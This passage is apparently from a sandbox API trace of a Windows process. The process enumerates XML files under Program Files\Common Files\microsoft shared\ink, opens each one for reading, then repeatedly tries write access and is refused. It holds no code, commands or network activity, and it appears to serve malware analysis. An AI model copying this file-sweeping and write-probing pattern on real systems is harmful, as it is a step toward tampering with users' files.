nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="symbols", cAlternateFileName="")) returned 1 [0099.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0099.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0099.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0099.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0099.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0099.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0099.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0099.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0099.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a238 [0099.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x55f20 [0099.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0099.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c5a8 [0099.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.633] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.633] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.633] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.633] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c5a8 | out: hHeap=0x20000) returned 1 [0099.633] AreFileApisANSI () returned 1 [0099.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols", lpUsedDefaultChar=0x0) returned 73 [0099.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0099.633] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.633] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0099.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0099.633] AreFileApisANSI () returned 1 [0099.633] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0099.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85260 [0099.633] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x85260, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols") returned 73 [0099.633] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.633] GetLastError () returned 0x5 [0099.633] GetLastError () returned 0x5 [0099.633] SetLastError (dwErrCode=0x5) [0099.633] GetLastError () returned 0x5 [0099.634] SetLastError (dwErrCode=0x5) [0099.634] GetLastError () returned 0x5 [0099.634] SetLastError (dwErrCode=0x5) [0099.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85260 | out: hHeap=0x20000) returned 1 [0099.634] AreFileApisANSI () returned 1 [0099.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0099.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85120 [0099.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x85120, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols") returned 73 [0099.634] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.634] GetLastError () returned 0x5 [0099.634] GetLastError () returned 0x5 [0099.634] SetLastError (dwErrCode=0x5) [0099.634] GetLastError () returned 0x5 [0099.634] SetLastError (dwErrCode=0x5) [0099.634] GetLastError () returned 0x5 [0099.634] SetLastError (dwErrCode=0x5) [0099.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85120 | out: hHeap=0x20000) returned 1 [0099.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0099.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0099.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0099.634] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.634] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.634] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.634] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0099.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x55f20 [0099.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0099.634] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c500 [0099.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.634] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x24f, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="symbols.xml", cAlternateFileName="")) returned 1 [0099.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0099.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0099.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0099.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0099.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d0d0 [0099.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cd88 [0099.635] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78490 [0099.635] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cf371, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0099.635] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3fbc74, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3fbc74, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3fbc74, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2b6, dwReserved0=0x0, dwReserved1=0x0, cFileName="ea-sym.xml", cAlternateFileName="")) returned 1 [0099.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cd88 | out: hHeap=0x20000) returned 1 [0099.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0099.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0099.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8ce30 [0099.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46a58 [0099.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c500 | out: hHeap=0x20000) returned 1 [0099.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0099.635] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0099.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0099.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0099.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0099.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0099.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0099.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0099.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0099.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c5a8 [0099.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xee) returned 0x4bb78 [0099.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c5a8 | out: hHeap=0x20000) returned 1 [0099.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81a88 [0099.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4bb78 | out: hHeap=0x20000) returned 1 [0099.636] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.636] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.636] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.636] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81a88 | out: hHeap=0x20000) returned 1 [0099.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0099.636] AreFileApisANSI () returned 1 [0099.636] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml", lpUsedDefaultChar=0x0) returned 84 [0099.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0099.636] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.636] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0099.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0099.636] AreFileApisANSI () returned 1 [0099.636] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 84 [0099.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa8) returned 0x604a8 [0099.636] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x604a8, cchWideChar=84 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml") returned 84 [0099.637] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0099.637] GetFileType (hFile=0x27c) returned 0x1 [0099.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x604a8 | out: hHeap=0x20000) returned 1 [0099.637] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.637] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.637] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.637] CloseHandle (hObject=0x27c) returned 1 [0099.638] AreFileApisANSI () returned 1 [0099.638] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 84 [0099.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa8) returned 0x5f798 [0099.638] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x5f798, cchWideChar=84 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml") returned 84 [0099.638] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.638] GetLastError () returned 0x5 [0099.638] GetLastError () returned 0x5 [0099.638] SetLastError (dwErrCode=0x5) [0099.638] GetLastError () returned 0x5 [0099.638] SetLastError (dwErrCode=0x5) [0099.638] GetLastError () returned 0x5 [0099.638] SetLastError (dwErrCode=0x5) [0099.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0099.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0099.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0099.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0099.638] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.638] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.638] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3d5a11, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3d5a11, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3d5a11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x325, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="ja-jp-sym.xml", cAlternateFileName="")) returned 1 [0099.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0099.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0099.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0099.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35270 [0099.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0099.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35270 | out: hHeap=0x20000) returned 1 [0099.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0099.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0099.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d178 [0099.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xee) returned 0x4b890 [0099.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d178 | out: hHeap=0x20000) returned 1 [0099.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81d68 [0099.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4b890 | out: hHeap=0x20000) returned 1 [0099.639] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.639] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.639] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.639] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81d68 | out: hHeap=0x20000) returned 1 [0099.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.639] AreFileApisANSI () returned 1 [0099.639] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml", lpUsedDefaultChar=0x0) returned 87 [0099.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0099.639] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.639] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0099.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0099.639] AreFileApisANSI () returned 1 [0099.639] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 87 [0099.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xae) returned 0x817a8 [0099.639] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x817a8, cchWideChar=87 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml") returned 87 [0099.640] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0099.640] GetFileType (hFile=0x27c) returned 0x1 [0099.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x817a8 | out: hHeap=0x20000) returned 1 [0099.640] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.640] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.640] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.640] CloseHandle (hObject=0x27c) returned 1 [0099.734] AreFileApisANSI () returned 1 [0099.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, 